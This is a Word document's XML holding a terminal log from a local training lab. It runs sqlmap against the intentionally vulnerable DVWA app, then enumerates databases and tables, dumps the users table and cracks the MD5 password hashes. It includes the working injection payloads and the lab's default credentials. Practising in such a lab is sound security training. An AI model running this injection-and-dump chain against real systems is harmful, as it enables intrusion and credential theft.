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6A3E" w:rsidRPr="00C76A3E" w:rsidRDefault="00C76A3E" w:rsidP="00C76A3E">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C76A3E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>(base) mac@Macs-MacBook-Pro docker %</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A3E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> docker compose up -d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Running 8/8</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vulnerable-host   Started                                                            0.4s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docker-mariadb-1  Running                                                            0.0s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juice-shop        Running                                                            0.0s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neo4j             Running                                                            0.0s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milvus            Started                                                            0.4s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minio             Running                                                            0.0s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dvwa              Running                                                            0.0s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w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A3E">
        <w:rPr>
          <w:rFonts w:ascii="Apple Color Emoji" w:eastAsia="Times New Roman" w:hAnsi="Apple Color Emoji" w:cs="Apple Color Emoji"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A3E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Container kali              Running                                                            0.0s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
      </w: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(base) mac@Macs-MacBook-Pro</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A3E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> docker % docker ps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CONTAINER ID   IMAGE                      COMMAND                  CREATED       STATUS          PORTS                                                      NAMES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db38e616be40   minio/minio                "/usr/bin/docker-ent…"   5 weeks ago   Up 42 seconds   0.0.0.0:9000-&gt;9000/tcp                                     minio</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88e7356053dc   vulnerables/web-dvwa       "/main.sh"               5 weeks ago   Up 41 seconds   0.0.0.0:8081-&gt;80/tcp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165d2c308285   bkimminich/juice-shop      "/nodejs/bin/node /j…"   5 weeks ago   Up 41 seconds   0.0.0.0:3000-&gt;3000/tcp                                     juice-shop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861abae8c468   mariadb:10.5               "docker-entrypoint.s…"   5 weeks ago   Up 42 seconds   3306/tcp                                                   docker-mariadb-1</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fbe2d056175a   neo4j:5                    "tini -g -- /startup…"   5 weeks ago   Up 41 seconds   0.0.0.0:7474-&gt;7474/tcp, 7473/tcp, 0.0.0.0:7687-&gt;7687/tcp   neo4j</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86a80ac0f06e   kalilinux/kali-rolling     "bash"                   5 weeks ago   Up 41 seconds                                                              kali</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9ecc9b8b1364   tleemcjr/metasploitable2   "sh -c '/bin/service…"   5 weeks ago   Up 4 seconds    0.0.0.0:80-&gt;80/tcp, 0.0.0.0:2222-&gt;22/tcp                   vulnerable-host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
      </w: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(base) mac@Macs-MacBook-Pro docker %</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A3E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> docker exec -it kali /bin/bash</w:t>
      </w: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root@86a80ac0f06e:/#</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A3E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> jq '.sqlmap.allowed_flags' /root/scripts/allowlist.json</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"-u",</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"--data",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"--batch",</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"--level",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"--cookie"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root@86a80ac0f06e:/#</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A3E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> /root/scripts/run_allowed.sh sqlmap -u "http://dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit" --cookie="PHPSESSID=jqfr7435v2lml5a54ip1jgmco7; security=low"</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__H__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 ___[,]_____ ___ ___  {1.9.10#stable}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 -| . [,]     | .'| .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|___|_  [)]_|_|_|__,|  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|_|V...       |_|   https://sqlmap.org</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starting @ 17:35:08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[17:35:08] [INFO] testing connection to the target URL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[17:35:08] [INFO] testing if the target URL content is stable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[17:35:09] [INFO] target URL content is stable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[17:35:09] [INFO] testing if GET parameter 'id' is dynamic</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[17:35:09] [WARNING] GET parameter 'id' does not appear to be dynamic</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[17:35:09] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')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[17:35:09] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks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[17:35:09] [INFO] testing for SQL injection on GET parameter 'id'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it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes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y</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C76A3E" w:rsidRPr="00C76A3E" w:rsidRDefault="00C76A3E" w:rsidP="00C76A3E">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C76A3E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A3E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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[17:36:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'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[17:36:41] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)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[17:36:41] [WARNING] reflective value(s) found and filtering out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[17:36:41] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'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[17:36:41] [INFO] testing 'Generic inline queries'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[17:36:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause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[17:36:42] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause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[17:36:42] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT -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[17:36:42] [INFO] GET parameter 'id' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable (with --not-string="Me")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[17:36:42] [INFO] testing 'MySQL &gt;= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'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[17:36:42] [INFO] testing 'MySQL &gt;= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'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[17:36:42] [INFO] testing 'MySQL &gt;= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'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[17:36:42] [INFO] testing 'MySQL &gt;= 5.5 OR error-based - WHERE or HAVING clause (EXP)'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5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'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5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'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5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'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5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'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5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'</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[17:36:43] [INFO] GET parameter 'id' is 'MySQL &gt;= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable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inline queries'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5.0.12 stacked queries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5.0.12 stacked queries'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[17:36:43] [INFO] testing 'MySQL &gt;= 5.0.12 stacked queries (query SLEEP -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5.0.12 stacked queries (query SLEEP)'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&lt; 5.0.12 stacked queries (BENCHMARK -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&lt; 5.0.12 stacked queries (BENCHMARK)'</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[17:36:43] [INFO] testing 'MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)'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[17:36:53] [INFO] GET parameter 'id' appears to be 'MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)' injectable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[17:36:53] [INFO] testing 'Generic UNION query (NULL) - 1 to 20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[17:36:53] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20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[17:36:53] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found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[17:36:53] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test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[17:36:53] [INFO] target URL appears to have 2 columns in query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[17:36:53] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable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[17:36:53] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval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GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n</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sqlmap identified the following injection point(s) with a total of 154 HTTP(s) requests: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Parameter: id (GET)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boolean-based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OR boolean-based blind - WHERE or HAVING clause (NOT -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OR NOT 2779=2779#&amp;Submit=Submit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 xml:space="preserve">    Type: error-based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 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</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1138 FROM(SELECT COUNT(*),CONCAT(0x716a786271,(SELECT (ELT(1138=1138,1))),0x71626a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nQnE&amp;Submit=Submit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time-based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5.0.12 AND time-based blind (query SLEEP)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1579 FROM (SELECT(SLEEP(5)))uAld)-- sOAV&amp;Submit=Submit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UNION query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UNION query (NULL) - 2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UNION ALL SELECT NULL,CONCAT(0x716a786271,0x4c4169437763496b4d6355534a64766c6f6c5874697247554b674e516e6157746f67515754537954,0x71626a7a71)#&amp;Submit=Submit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[17:37:29] [INFO] the back-end DBMS is MySQL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server operating system: Linux Debian 9 (stretch)</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application technology: Apache 2.4.25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back-end DBMS: MySQL &gt;= 5.0 (MariaDB fork)</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[17:37:29] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/dvwa'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ending @ 17:37:29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lastRenderedPageBreak/>
        <w:t>root@86a80ac0f06e:/#</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A3E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> jq '.sqlmap.allowed_flags' /root/scripts/allowlist.json</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"-u",</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"--data",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"--batch",</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"--level",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"--cookie",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"--dbs",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"--tables",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"--dump"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root@86a80ac0f06e:/#</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A3E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> /root/scripts/run_allowed.sh sqlmap   -u "http://dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit"   --cookie="PHPSESSID=jqfr7435v2lml5a54ip1jgmco7; security=low"   --dbs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__H__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 ___[.]_____ ___ ___  {1.9.10#stable}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 -| . [']     | .'| .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|___|_  [.]_|_|_|__,|  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|_|V...       |_|   https://sqlmap.org</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legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal </w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A3E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program</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starting @ 17:40:38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[17:40:38] [INFO] resuming back-end DBMS 'mysql'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[17:40:39] [INFO] testing connection to the target URL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sqlmap resumed the following injection point(s) from stored session:</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Parameter: id (GET)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boolean-based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OR boolean-based blind - WHERE or HAVING clause (NOT -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OR NOT 2779=2779#&amp;Submit=Submit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error-based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 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</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1138 FROM(SELECT COUNT(*),CONCAT(0x716a786271,(SELECT (ELT(1138=1138,1))),0x71626a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nQnE&amp;Submit=Submit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time-based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5.0.12 AND time-based blind (query SLEEP)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1579 FROM (SELECT(SLEEP(5)))uAld)-- sOAV&amp;Submit=Submit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 xml:space="preserve">    Type: UNION query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UNION query (NULL) - 2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UNION ALL SELECT NULL,CONCAT(0x716a786271,0x4c4169437763496b4d6355534a64766c6f6c5874697247554b674e516e6157746f67515754537954,0x71626a7a71)#&amp;Submit=Submit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[17:40:39] [INFO] the back-end DBMS is MySQL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server operating system: Linux Debian 9 (stretch)</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application technology: Apache 2.4.25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back-end DBMS: MySQL &gt;= 5.0 (MariaDB fork)</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[17:40:39] [INFO] fetching database names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[17:40:39] [WARNING] reflective value(s) found and filtering out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available databases [2]:</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information_schema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[17:40:39] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/dvwa'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ending @ 17:40:39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root@86a80ac0f06e:/#</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A3E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> /root/scripts/run_allowed.sh sqlmap   -u "http://dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit"   --cookie="PHPSESSID=jqfr7435v2lml5a54ip1jgmco7; security=low"   -D dvwa   --tables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__H__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 xml:space="preserve"> ___ ___[)]_____ ___ ___  {1.9.10#stable}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 -| . [)]     | .'| .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|___|_  [(]_|_|_|__,|  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|_|V...       |_|   https://sqlmap.org</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starting @ 17:41:54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[17:41:54] [INFO] resuming back-end DBMS 'mysql'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[17:41:54] [INFO] testing connection to the target URL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sqlmap resumed the following injection point(s) from stored session:</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Parameter: id (GET)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boolean-based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OR boolean-based blind - WHERE or HAVING clause (NOT -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OR NOT 2779=2779#&amp;Submit=Submit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error-based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 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</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1138 FROM(SELECT COUNT(*),CONCAT(0x716a786271,(SELECT (ELT(1138=1138,1))),0x71626a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nQnE&amp;Submit=Submit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time-based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5.0.12 AND time-based blind (query SLEEP)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1579 FROM (SELECT(SLEEP(5)))uAld)-- sOAV&amp;Submit=Submit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UNION query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UNION query (NULL) - 2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UNION ALL SELECT NULL,CONCAT(0x716a786271,0x4c4169437763496b4d6355534a64766c6f6c5874697247554b674e516e6157746f67515754537954,0x71626a7a71)#&amp;Submit=Submit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[17:41:54] [INFO] the back-end DBMS is MySQL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server operating system: Linux Debian 9 (stretch)</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application technology: Apache 2.4.25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back-end DBMS: MySQL &gt;= 5.0 (MariaDB fork)</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[17:41:54] [INFO] fetching tables for database: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[17:41:55] [WARNING] reflective value(s) found and filtering out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Database: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[2 tables]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guestbook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users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[17:41:55] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/dvwa'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ending @ 17:41:55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root@86a80ac0f06e:/#</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A3E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> /root/scripts/run_allowed.sh sqlmap   -u "http://dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit"   --cookie="PHPSESSID=jqfr7435v2lml5a54ip1jgmco7; security=low"   -D dvwa   -T users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__H__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 ___[']_____ ___ ___  {1.9.10#stable}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 -| . [(]     | .'| .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|___|_  [.]_|_|_|__,|  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|_|V...       |_|   https://sqlmap.org</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starting @ 17:42:35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[17:42:35] [INFO] resuming back-end DBMS 'mysql'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[17:42:35] [INFO] testing connection to the target URL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sqlmap resumed the following injection point(s) from stored session:</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Parameter: id (GET)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boolean-based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OR boolean-based blind - WHERE or HAVING clause (NOT -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OR NOT 2779=2779#&amp;Submit=Submit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error-based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 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</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1138 FROM(SELECT COUNT(*),CONCAT(0x716a786271,(SELECT (ELT(1138=1138,1))),0x71626a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nQnE&amp;Submit=Submit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time-based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5.0.12 AND time-based blind (query SLEEP)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1579 FROM (SELECT(SLEEP(5)))uAld)-- sOAV&amp;Submit=Submit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UNION query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UNION query (NULL) - 2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UNION ALL SELECT NULL,CONCAT(0x716a786271,0x4c4169437763496b4d6355534a64766c6f6c5874697247554b674e516e6157746f67515754537954,0x71626a7a71)#&amp;Submit=Submit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[17:42:35] [INFO] the back-end DBMS is MySQL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server operating system: Linux Debian 9 (stretch)</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application technology: Apache 2.4.25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back-end DBMS: MySQL &gt;= 5.0 (MariaDB fork)</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[17:42:35] [INFO] fetching columns for table 'users' in database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[17:42:36] [WARNING] reflective value(s) found and filtering out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Database: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Table: users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[8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Column       | Type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user         | varchar(15)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avatar       | varchar(70)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failed_login | int(3)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first_name   | varchar(15)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last_login   | timestamp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last_name    | varchar(15)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password     | varchar(32)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user_id      | int(6)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[17:42:36] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/dvwa'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ending @ 17:42:36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root@86a80ac0f06e:/# /root/scripts/run_allowed.sh sqlmap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-u "http://dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  --cookie="PHPSESSID=jqfr7435v2lml5a54ip1jgmco7; security=low"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-D dvwa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 users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--dump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__H__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___ ___[(]_____ ___ ___  {1.9.10#stable}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 -| . [.]     | .'| .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|___|_  [,]_|_|_|__,|  _|</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|_|V...       |_|   https://sqlmap.org</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legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program</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starting @ 17:44:56 /2025-11-25/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[17:44:56] [INFO] resuming back-end DBMS 'mysql'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[17:44:56] [INFO] testing connection to the target URL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sqlmap resumed the following injection point(s) from stored session:</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Parameter: id (GET)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boolean-based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OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)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OR NOT 2779=2779#&amp;Submit=Submit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error-based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 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</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1138 FROM(SELECT COUNT(*),CONCAT(0x716a786271,(SELECT (ELT(1138=1138,1))),0x71626a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nQnE&amp;Submit=Submit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time-based blind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&gt;= 5.0.12 AND time-based blind (query SLEEP)</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AND (SELECT 1579 FROM (SELECT(SLEEP(5)))uAld)-- sOAV&amp;Submit=Submit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Type: UNION query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Title: MySQL UNION query (NULL) - 2 columns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    Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x716a786271,0x4c4169437763496b4d6355534a64766c6f6c5874697247554b674e516e6157746f67515754537954,0x71626a7a71)#&amp;Submit=Submit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[17:44:56] [INFO] the back-end DBMS is MySQL</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server operating system: Linux Debian 9 (stretch)</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web application technology: Apache 2.4.25</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back-end DBMS: MySQL &gt;= 5.0 (MariaDB fork)</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[17:44:56] [INFO] fetching columns for table 'users' in database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[17:44:56] [INFO] fetching entries for table 'users' in database 'dvwa'</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[17:44:56] [WARNING] reflective value(s) found and filtering out</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[17:44:56] [INFO] recognized possible password hashes in column 'password'</w:t>
      </w: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lastRenderedPageBreak/>
        <w:t>do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A3E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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[17:46:15] [INFO] writing hashes to a temporary file '/tmp/sqlmapu97xo6xq171/sqlmaphashes-r9725pku.txt' </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C76A3E" w:rsidRPr="00C76A3E"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do you want to crack them via a dictionary-based attack? [Y/n/q]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A3E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Y</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[17:46:51] [INFO] using hash method 'md5_generic_passwd'</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what dictionary do you want to use?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 default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)</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[2] custom dictionary file</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[3] file with list of dictionary files</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 xml:space="preserve">&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C76A3E" w:rsidRPr="00C76A3E" w:rsidRDefault="00C76A3E" w:rsidP="00C76A3E">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C76A3E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>[17:47:18] [INFO] using default dictionary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC776A" w:rsidRDefault="00C76A3E" w:rsidP="00C76A3E">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C76A3E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">do you want to use common password suffixes? (slow!) [y/N] </w:t>
      </w:r>
      <w:r w:rsidRPr="00C76A3E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-GB"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>y</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[17:47:26] [INFO] starting dictionary-based cracking (md5_generic_passwd)</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[17:47:26] [INFO] starting 16 processes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[17:47:29] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'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[17:47:31] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'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[17:47:34] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'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[17:47:35] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'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[17:47:38] [INFO] using suffix '1'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[17:47:51] [INFO] using suffix '123'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lastRenderedPageBreak/>
        <w:t xml:space="preserve">[17:47:53] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'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[17:48:01] [INFO] using suffix '2'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[17:48:12] [INFO] using suffix '12'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[17:48:24] [INFO] using suffix '3'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[17:48:35] [INFO] using suffix '13'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[17:48:47] [INFO] using suffix '7'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[17:48:58] [INFO] using suffix '11'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[17:49:09] [INFO] using suffix '5'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[17:49:20] [INFO] using suffix '22'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[17:49:31] [INFO] using suffix '23'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[17:49:41] [INFO] using suffix '01'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[17:49:53] [INFO] using suffix '4'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[17:50:04] [INFO] using suffix '07'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[17:50:15] [INFO] using suffix '21'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[17:50:26] [INFO] using suffix '14'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[17:50:37] [INFO] using suffix '10'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[17:50:48] [INFO] using suffix '06'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[17:50:59] [INFO] using suffix '08'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[17:51:10] [INFO] using suffix '8'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[17:51:20] [INFO] using suffix '15'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[17:51:31] [INFO] using suffix '69'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[17:51:41] [INFO] using suffix '16'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[17:51:52] [INFO] using suffix '6'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[17:52:04] [INFO] using suffix '18'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lastRenderedPageBreak/>
        <w:t xml:space="preserve">[17:52:15]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[17:52:26]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[17:52:37]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[17:52:48]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[17:52:58]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[17:53:10]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[17:53:21]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[17:53:32]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[17:53:43]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[17:53:53] [INFO] using suffix '@'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xml:space="preserve">Database: dvwa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Table: users</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[5 entries]</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user_id | user    | avatar                      | password                                    | last_name | first_name | last_login          | failed_login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1       | admin   | /hackable/users/admin.jpg   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      | 2025-11-25 16:48:19 | 0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2       | gordonb | /hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     | 2025-11-25 16:48:19 | 0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3       | 1337    | /hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       | 2025-11-25 16:48:19 | 0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4       | pablo   | /hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      | 2025-11-25 16:48:19 | 0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lastRenderedPageBreak/>
        <w:t>| 5       | smithy  | /hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        | 2025-11-25 16:48:19 | 0            |</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w:t>
      </w:r>
    </w:p>
